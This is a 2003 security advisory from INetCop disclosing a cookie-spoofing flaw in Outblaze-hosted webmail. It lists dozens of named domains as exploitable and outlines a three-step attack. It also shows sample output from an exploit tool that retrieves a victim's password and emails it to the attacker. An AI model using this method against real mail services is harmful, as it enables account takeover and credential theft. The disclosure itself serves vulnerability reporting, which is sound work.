========================================== INetCop Security Advisory #2003-0x82-014.b ========================================== * Title: ++Danger++ Outblaze Web based e-mail that is exposed in very dangerous state !!! 0x01. Description Hackermail.com (Outblaze Web based e-mail) is mail service that I use. Last week, someone hacked `xploit@hackermail.com' that I'm using. (hacked several people. wow, very funny kiddies !) And, I looked for the first step. It was problem in Outblaze Web based e-mail service. I also, could find again my mail password. hehe It because of cookie such as fool! Many mail users get overridden. I yet, did not try conversation with mail hacking criminal. However, It's sure that I find funny and interesting truth thanks to. ++Update Advisory version #2003-0x82-014.b++ I know interesting truth still more. This can hack almost Outblaze Web based e-mail service !!! w00h00~! 0x02. Vulnerable Sites Vendor site: ? http://www.outblaze.com (Desire to visit.) +------------------------------+----------------+---------------------------+ | mail server | vulnerable? | exploitable? | +------------------------------+----------------+---------------------------+ | http://www.amrer.net | vulnerable | exploitable | | http://www.amuro.net | vulnerable | exploitable | | http://www.amuromail.com | vulnerable | exploitable | | http://www.astroboymail.com | vulnerable | exploitable | | http://www.dbzmail.com | vulnerable | exploitable | | http://www.doramail.com | vulnerable | exploitable | | http://www.glay.org | vulnerable | exploitable | | http://www.jpopmail.com | vulnerable | exploitable | | http://www.keromail.com | vulnerable | exploitable | | http://www.kichimail.com | vulnerable | exploitable | | http://www.norikomail.com | vulnerable | exploitable | | http://www.otakumail.com | vulnerable | exploitable | | http://www.smapxsmap.net | vulnerable | - Don't change hint | | http://www.uymail.com | vulnerable | exploitable | | http://www.yyhmail.com | vulnerable | exploitable | | http://mail.china139.com | vulnerable | exploitable | | http://www.mailasia.com | vulnerable | exploitable | | http://www.aaronkwok.net | vulnerable | exploitable | | http://www.bsdmail.org | vulnerable | exploitable | | http://www.bsdmail.com | vulnerable | exploitable | | http://www.ezagenda.com | vulnerable | - Don't change hint | | http://www.fastermail.com | vulnerable | - Don't change hint | | http://www.wongfaye.com | vulnerable | exploitable | | http://www.graffiti.net | vulnerable | exploitable | | http://www.hackermail.com | vulnerable | exploitable | | http://www.kellychen.com | vulnerable | exploitable | | http://www.leonlai.net | vulnerable | exploitable | | http://www.linuxmail.org | vulnerable | exploitable | | http://www.outblaze.net | vulnerable | exploitable | | http://www.outblaze.org | vulnerable | exploitable | | http://www.outgun.com | vulnerable | exploitable | | http://www.surfy.net | vulnerable | exploitable | | http://www.pakistans.com | vulnerable | exploitable | | http://www.jaydemail.com | vulnerable | exploitable | | http://www.joinme.com | vulnerable | exploitable | | http://www.marchmail.com | vulnerable | exploitable | | http://mail.nctta.org | vulnerable | exploitable | | http://mail.portugalnet.com | vulnerable | exploitable | | http://boardermail.com | vulnerable | exploitable | | http://www.mailpuppy.com | vulnerable | exploitable | | http://www.melodymail.com | vulnerable | - Don't change hint | | http://www.twinstarsmail.com | vulnerable | - Don't change hint | | http://www.purinmail.com | vulnerable | exploitable | | http://www.gundamfan.com | vulnerable | - Don't change hint | | http://www.slamdunkfan.com | vulnerable | - Don't change hint | | http://www.movemail.com | vulnerable | - Don't change hint | | http://startvclub.com | vulnerable | - Don't change hint | | http://ultrapostman.com | vulnerable | exploitable | | http://mail.sailormoon.com | vulnerable | exploitable | +------------------------------+----------------+---------------------------+ * We confirmed already and all. If there is other places that use Outblaze, inform. 0x03. Exploit Cookie Spooing Exploit method is very simple. 1. First, read user's cookie. 2. Change mail id, domain, etc... cookie informations. 3. And, deceive it. hehe, it's very easy? Its application is very simple. Hack user's information page. (information correction) Thereafter, can find out password. yah0o ~! I exhibited exploit to my friends not long ago. The following is my xploit execution result. bash$ ./0x82-eat_outblaze_0dayxpl Outblaze Web based e-mail User Cookie Spoofing 0day exploit by Xpl017Elz. Usage: ./0x82-eat_outblaze_0dayxpl -option [argument] -t [target num] - target mail server. -i [mail id] - target mail id. -m [mail addr] - your mail address. -h - help information. Select target mail number: {0} amrer.net {1} amuro.net {2} amuromail.com {3} astroboymail.com {4} dbzmail.com {5} doramail.com {6} glay.org {7} jpopmail.com {8} keromail.com {9} kichimail.com {10} norikomail.com {11} otakumail.com {12} smapxsmap.net {13} uymail.com {14} yyhmail.com {15} china139.com {16} mailasia.com {17} aaronkwok.net {18} bsdmail.com {19} bsdmail.org {20} ezagenda.com {21} fastermail.com {22} wongfaye.com {23} graffiti.net {24} hackermail.com {25} kellychen.com {26} leonlai.net {27} linuxmail.org {28} outblaze.net {29} outblaze.org {30} outgun.com {31} surfy.net {32} pakistans.com {33} jaydemail.com {34} joinme.com {35} marchmail.com {36} nctta.org {37} portugalnet.com {38} boardermail.com {39} mailpuppy.com {40} melodymail.com {41} twinstarsmail.com {42} purinmail.com {43} gundamfan.com {44} slamdunkfan.com {45} movemail.com {46} startvclub.com {47} ultrapostman.com {48} sailormoon.com Example> ./0x82-eat_outblaze_0dayxpl -t 0 -i admin -m your_mail@mail.com bash$ bash$ ./0x82-eat_outblaze_0dayxpl -t 24 -i tester -m attacker@testmail.com Outblaze Web based e-mail User Cookie Spoofing 0day exploit by Xpl017Elz. ============================================================ ++ Cookie Spoofing Brute-force mode. ++ [*] Connected to http://www.hackermail.com/. [*] target mail address: tester@hackermail.com. [*] Wait, getting password: This is your password: Happy-Exploit [*] Password sent out by your e-mail (attacker@testmail.com). ============================================================ bash$ This code may have spewed password if put ID that want to attack. Also, password is sent out your mail. 0x04. Patch -- There is document about cookie security very much. We notified this truth to Outblaze Web based e-mail solution before. Soon is going to become patch. -- Thank you. P.S: Sorry, for my poor english. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net & http://x82.inetcop.org GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y -- -- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze